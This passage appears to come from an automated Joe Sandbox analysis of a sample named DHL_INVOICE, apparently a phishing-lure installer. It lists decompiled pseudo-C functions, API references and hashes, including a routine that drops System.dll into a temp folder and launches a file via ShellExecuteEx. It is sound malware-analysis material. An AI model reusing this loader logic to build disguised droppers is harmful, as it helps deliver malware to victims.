                                                                            0x6f1c1f6c
                                                                            0x6f1c1f71
                                                                            0x6f1c1f2b
                                                                            0x6f1c1f35
                                                                            0x6f1c1f3b
                                                                            0x6f1c1f43
                                                                            0x6f1c1f43
                                                                            0x6f1c1f46
                                                                            0x6f1c1f51
                                                                            0x6f1c1f57
                                                                            0x6f1c1f7a

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpywsprintf
                                                                            • String ID: callback%d$error
                                                                            • API String ID: 2408954437-1307476583
                                                                            • Opcode ID: c6fcfb0611b26d03d3fa8ff0ac8253b87c508df7341091962888beb761e8b5d2
                                                                            • Instruction ID: 8d1f2c906a6b0f6eabac68457f043137303d22d33ee90686706beb0d2389cc4c
                                                                            • Opcode Fuzzy Hash: c6fcfb0611b26d03d3fa8ff0ac8253b87c508df7341091962888beb761e8b5d2
                                                                            • Instruction Fuzzy Hash: 17F08234288110AFD7088B08D548DFA73A5FF96390F0681A8F849AB201C779AC748B93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E00406556(WCHAR* _a4) {
                                                                            				WCHAR* _t9;
                                                                            
                                                                            				_t9 = _a4;
                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                            				_push(_t9);
                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                            					lstrcatW(_t9, 0x4092b0);
                                                                            				}
                                                                            				return _t9;
                                                                            			}




                                                                            0x00406557
                                                                            0x00406565
                                                                            0x00406566
                                                                            0x00406571
                                                                            0x00406579
                                                                            0x00406579
                                                                            0x00406582

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CC3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 0040655C
                                                                            • CharPrevW.USER32(?,00000000), ref: 00406567
                                                                            • lstrcatW.KERNEL32(?,004092B0), ref: 00406579
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406556
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
                                                                            • Instruction ID: 519304617d09d62b109db9489078dc762d93bb7b848864bf6502fc90c90d6087
                                                                            • Opcode Fuzzy Hash: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
                                                                            • Instruction Fuzzy Hash: 3BD05E31502521BBC7029B64AD08D9B7BBCEF46301301446AFA41B3165C7745D41C7ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E0040285F(intOrPtr* __edi, void* __ebp, void* _a12, signed int _a20, intOrPtr _a36, void* _a44, intOrPtr _a48, void* _a72, intOrPtr _a80) {
                                                                            				void* _v4;
                                                                            				intOrPtr _t27;
                                                                            				intOrPtr _t29;
                                                                            				intOrPtr _t30;
                                                                            				intOrPtr* _t31;
                                                                            				void* _t33;
                                                                            				int _t36;
                                                                            				void* _t40;
                                                                            				void* _t42;
                                                                            
                                                                            				_t40 = __ebp;
                                                                            				_t31 = __edi;
                                                                            				_t29 = _a36;
                                                                            				_t30 = _a48;
                                                                            				_a80 = _t30;
                                                                            				_t27 = 1;
                                                                            				_a20 = 0 | _t29 == 0x00000038;
                                                                            				if(_t30 == 0) {
                                                                            					if(_t29 != 0x38) {
                                                                            						_t36 = lstrlenW(E0040303E(_t30, 0x11)) + _t15;
                                                                            					} else {
                                                                            						E0040303E(_t30, 0x21);
                                                                            						E00406469("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp", 0x40b908, 0x400);
                                                                            						_t42 = _t42 + 0xc;
                                                                            						_t36 = lstrlenA(0x40b908);
                                                                            					}
                                                                            				} else {
                                                                            					 *0x40b908 = E00403002(1);
                                                                            					_pop(_t29);
                                                                            					_t36 = (_a20 ^ 1) + 1;
                                                                            				}
                                                                            				if( *_t31 != _t40) {
                                                                            					_t33 = E00406C25(_t31);
                                                                            					if(( *(_t42 + 0x14) |  *(_t42 + 0x50)) != 0 ||  *((intOrPtr*)(_t42 + 0x34)) == _t40 || E00406484(_t33, _t33) >= 0) {
                                                                            						if(E00406A0B(_t29, _t33, ?str?, _t36) != 0) {
                                                                            							_t27 =  *((intOrPtr*)(_t42 + 0x10));
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + _t27;
                                                                            				return 0;
                                                                            			}












                                                                            0x0040285f
                                                                            0x0040285f
                                                                            0x0040285f
                                                                            0x00402865
                                                                            0x0040286c
                                                                            0x0040287a
                                                                            0x0040287b
                                                                            0x00402881
                                                                            0x0040289c
                                                                            0x004028d2
                                                                            0x0040289e
                                                                            0x004028a0
                                                                            0x004028b0
                                                                            0x004028b5
                                                                            0x004028bf
                                                                            0x004028bf
                                                                            0x00402883
                                                                            0x0040288f
                                                                            0x00402895
                                                                            0x00402896
                                                                            0x00402896
                                                                            0x004028d7
                                                                            0x004028e3
                                                                            0x004028ed
                                                                            0x00402912
                                                                            0x00402ea1
                                                                            0x00402ea1
                                                                            0x00402912
                                                                            0x004028ed
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 004028B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsaE104.tmp$C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll
                                                                            • API String ID: 1659193697-173368024
                                                                            • Opcode ID: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
                                                                            • Instruction ID: 711803fd364401e957546549a979f7dfd5371b874df28eda27acfe343a1b9a3f
                                                                            • Opcode Fuzzy Hash: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
                                                                            • Instruction Fuzzy Hash: 9A112676A443116BD310AB618A8992FB7E4AF84354F15453FF905F31C1D7FC980183AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                            			E00402077(intOrPtr _a8, signed char _a28, intOrPtr _a32, char _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char* _a80, signed char _a84, void* _a104, void* _a108) {
                                                                            				void* _v12;
                                                                            				intOrPtr _t19;
                                                                            				void* _t31;
                                                                            				void* _t37;
                                                                            				void* _t38;
                                                                            				void* _t42;
                                                                            
                                                                            				_t31 = E0040303E(_t37, _t42);
                                                                            				_t19 = E0040303E(_t37, 0x31);
                                                                            				_t38 = E0040303E(_t37, 0x22);
                                                                            				E0040303E(_t37, 0x15);
                                                                            				E00405D3A(0xffffffec, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            				_a64 = _a8;
                                                                            				_a60 = _a32;
                                                                            				_a84 = _a28;
                                                                            				_a72 = _t19;
                                                                            				_t25 =  !=  ? _t31 : 0;
                                                                            				_a68 =  !=  ? _t31 : 0;
                                                                            				_a80 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible";
                                                                            				_t27 =  !=  ? _t38 : 0;
                                                                            				_a76 =  !=  ? _t38 : 0;
                                                                            				if(E004069F3( &_a56) != 0) {
                                                                            					if((_a84 & 0x00000040) != 0) {
                                                                            						E00406514(__ecx,  *((intOrPtr*)(__esp + 0x88)));
                                                                            						_push( *((intOrPtr*)(__esp + 0x88)));
                                                                            						CloseHandle();
                                                                            					}
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + 1;
                                                                            				return 0;
                                                                            			}









                                                                            0x0040207f
                                                                            0x00402081
                                                                            0x00402091
                                                                            0x00402093
                                                                            0x0040209f
                                                                            0x004020ac
                                                                            0x004020b2
                                                                            0x004020ba
                                                                            0x004020c1
                                                                            0x004020c5
                                                                            0x004020c8
                                                                            0x004020d1
                                                                            0x004020d9
                                                                            0x004020dc
                                                                            0x004020ec
                                                                            0x004020f7
                                                                            0x00402104
                                                                            0x00402109
                                                                            0x00402110
                                                                            0x00402110
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
                                                                              • Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?), ref: 00405D99
                                                                              • Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 00405DB1
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                                                              • Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02
                                                                              • Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
                                                                              • Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548
                                                                            • CloseHandle.KERNEL32(?,?), ref: 00402110
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\mnstring\Forcible, xrefs: 004020D1
                                                                            • C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll, xrefs: 00402098
                                                                            • @, xrefs: 004020F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                                                            • String ID: @$C:\Users\user\AppData\Local\Temp\mnstring\Forcible$C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll
                                                                            • API String ID: 4079680657-3105984991
                                                                            • Opcode ID: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
                                                                            • Instruction ID: 7c7d4bc9f8110f395c3ef373be7a4f0c936d35dff6000358c7303bcbf620d08d
                                                                            • Opcode Fuzzy Hash: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
                                                                            • Instruction Fuzzy Hash: 47118F716083809BC310AF61C98561BBBE5BF84349F00493EF595E72D1DBBC8845CB4A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00403389(intOrPtr _a4) {
                                                                            				long _t2;
                                                                            				struct HWND__* _t3;
                                                                            				struct HWND__* _t6;
                                                                            
                                                                            				if(_a4 == 0) {
                                                                            					if( *0x40d970 == 0) {
                                                                            						_t2 = GetTickCount();
                                                                            						if(_t2 >  *0x435a00) {
                                                                            							_t3 = CreateDialogParamW( *0x4349f4, 0x6f, 0, E0040364F, 0);
                                                                            							 *0x40d970 = _t3;
                                                                            							return ShowWindow(_t3, 5);
                                                                            						}
                                                                            						return _t2;
                                                                            					} else {
                                                                            						return E0040620F(0);
                                                                            					}
                                                                            				} else {
                                                                            					_t6 =  *0x40d970; // 0x0
                                                                            					if(_t6 != 0) {
                                                                            						_t6 = DestroyWindow(_t6);
                                                                            					}
                                                                            					 *0x40d970 =  *0x40d970 & 0x00000000;
                                                                            					return _t6;
                                                                            				}
                                                                            			}






                                                                            0x0040338e
                                                                            0x004033af
                                                                            0x004033b9
                                                                            0x004033c5
                                                                            0x004033d8
                                                                            0x004033e1
                                                                            0x00000000
                                                                            0x004033e6
                                                                            0x004033ec
                                                                            0x004033b1
                                                                            0x004033b8
                                                                            0x004033b8
                                                                            0x00403390
                                                                            0x00403390
                                                                            0x00403397
                                                                            0x0040339a
                                                                            0x0040339a
                                                                            0x004033a0
                                                                            0x004033a7
                                                                            0x004033a7

                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00403579), ref: 0040339A
                                                                            • GetTickCount.KERNEL32 ref: 004033B9
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040364F,00000000), ref: 004033D8
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004033E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
                                                                            • Instruction ID: 0c7035cfe5d59141003efccf1163e7ed1ec08c4572f7111a89f6d0b07e944292
                                                                            • Opcode Fuzzy Hash: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
                                                                            • Instruction Fuzzy Hash: 87F098B0981300BBEB24AF60EE4DB5A3AB8B744B03F800979F505B51E1DB795955DA1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E00406977(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short* _a12, char* _a16, int _a20) {
                                                                            				void* _v8;
                                                                            				int _v12;
                                                                            				void* _t20;
                                                                            				char _t21;
                                                                            				long _t24;
                                                                            				char* _t28;
                                                                            
                                                                            				_v12 = 0x800;
                                                                            				asm("sbb eax, eax");
                                                                            				_t20 = E004062D8(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_v8);
                                                                            				_t28 = _a16;
                                                                            				if(_t20 != 0) {
                                                                            					L4:
                                                                            					_t21 = 0;
                                                                            					 *_t28 = 0;
                                                                            				} else {
                                                                            					_t24 = RegQueryValueExW(_v8, _a12, 0,  &_a20, _t28,  &_v12);
                                                                            					RegCloseKey(_v8);
                                                                            					_t21 = 0;
                                                                            					_t28[0x7fe] = 0;
                                                                            					if(_t24 != 0 || _a20 != 1 && _a20 != 2) {
                                                                            						goto L4;
                                                                            					}
                                                                            				}
                                                                            				return _t21;
                                                                            			}









                                                                            0x00406980
                                                                            0x0040698d
                                                                            0x004069a0
                                                                            0x004069a5
                                                                            0x004069aa
                                                                            0x004069e9
                                                                            0x004069e9
                                                                            0x004069eb
                                                                            0x004069ac
                                                                            0x004069be
                                                                            0x004069c9
                                                                            0x004069cf
                                                                            0x004069d3
                                                                            0x004069db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069db
                                                                            0x004069f0

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405FBE), ref: 004069BE
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004069C9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
                                                                            • Instruction ID: a3e06d51c6875ee3f629547af2dd4b96d71687c661178dbbbd55dab6437f425a
                                                                            • Opcode Fuzzy Hash: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
                                                                            • Instruction Fuzzy Hash: D3010C7651010ABBDB218FA4DC06AEF7BA8EF45344F110126B901E2160D275DE60DB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E004058D0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                            				int _t8;
                                                                            				int _t11;
                                                                            				int _t15;
                                                                            				long _t16;
                                                                            
                                                                            				_t16 = _a16;
                                                                            				_t15 = _a8;
                                                                            				_t8 = _t15;
                                                                            				if(_t15 != 0x102) {
                                                                            					__eflags = _t15 - 0x200;
                                                                            					if(_t15 != 0x200) {
                                                                            						__eflags = _t8 - 0x419;
                                                                            						if(_t8 != 0x419) {
                                                                            							L9:
                                                                            							return CallWindowProcW( *0x42dd64, _a4, _t15, _a12, _t16);
                                                                            						}
                                                                            						L7:
                                                                            						__eflags =  *0x42ed68 - _t16; // 0x0
                                                                            						if(__eflags != 0) {
                                                                            							_push(_t16);
                                                                            							_push(6);
                                                                            							 *0x42ed68 = _t16;
                                                                            							E004054B6();
                                                                            						}
                                                                            						goto L9;
                                                                            					}
                                                                            					_t11 = IsWindowVisible(_a4);
                                                                            					__eflags = _t11;
                                                                            					if(_t11 == 0) {
                                                                            						goto L9;
                                                                            					}
                                                                            					_t16 = E004056DA(_a4, 1);
                                                                            					_t15 = 0x419;
                                                                            					goto L7;
                                                                            				}
                                                                            				if(_a12 != 0x20) {
                                                                            					goto L9;
                                                                            				}
                                                                            				E004054E8(0x413);
                                                                            				return 0;
                                                                            			}







                                                                            0x004058d4
                                                                            0x004058d8
                                                                            0x004058db
                                                                            0x004058e3
                                                                            0x004058f9
                                                                            0x004058ff
                                                                            0x00405921
                                                                            0x00405926
                                                                            0x0040593e
                                                                            0x00000000
                                                                            0x0040594c
                                                                            0x00405928
                                                                            0x00405928
                                                                            0x0040592e
                                                                            0x00405930
                                                                            0x00405931
                                                                            0x00405933
                                                                            0x00405939
                                                                            0x00405939
                                                                            0x00000000
                                                                            0x0040592e
                                                                            0x00405904
                                                                            0x0040590a
                                                                            0x0040590c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405918
                                                                            0x0040591a
                                                                            0x00000000
                                                                            0x0040591a
                                                                            0x004058e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004058f0
                                                                            0x00000000

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405904
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040594C
                                                                              • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
                                                                            • Instruction ID: 06e031647f3a40a893da8a12316d751141f27423df1ca697d7c88d312f012a23
                                                                            • Opcode Fuzzy Hash: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
                                                                            • Instruction Fuzzy Hash: 64018F72A00609FBEF305F51ED44A9B3A2AEB54760F104437F904B61E1C2798892DFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 44%
                                                                            			E00405864(signed int __eax) {
                                                                            				intOrPtr _v0;
                                                                            				intOrPtr _t10;
                                                                            				intOrPtr _t11;
                                                                            				intOrPtr* _t12;
                                                                            
                                                                            				_t11 =  *0x435a28;
                                                                            				_t10 =  *0x435a2c;
                                                                            				__imp__OleInitialize(0);
                                                                            				 *0x435a60 =  *0x435a60 | __eax;
                                                                            				E004054E8(0);
                                                                            				if(_t10 != 0) {
                                                                            					_t12 = _t11 + 0xc;
                                                                            					do {
                                                                            						_t10 = _t10 - 1;
                                                                            						if(( *(_t12 - 4) & 0x00000001) == 0) {
                                                                            							goto L4;
                                                                            						} else {
                                                                            							_push(_v0);
                                                                            							if(E00401399( *_t12) != 0) {
                                                                            								 *0x435acc =  *0x435acc + 1;
                                                                            							} else {
                                                                            								goto L4;
                                                                            							}
                                                                            						}
                                                                            						goto L7;
                                                                            						L4:
                                                                            						_t12 = _t12 + 0x818;
                                                                            					} while (_t10 != 0);
                                                                            				}
                                                                            				L7:
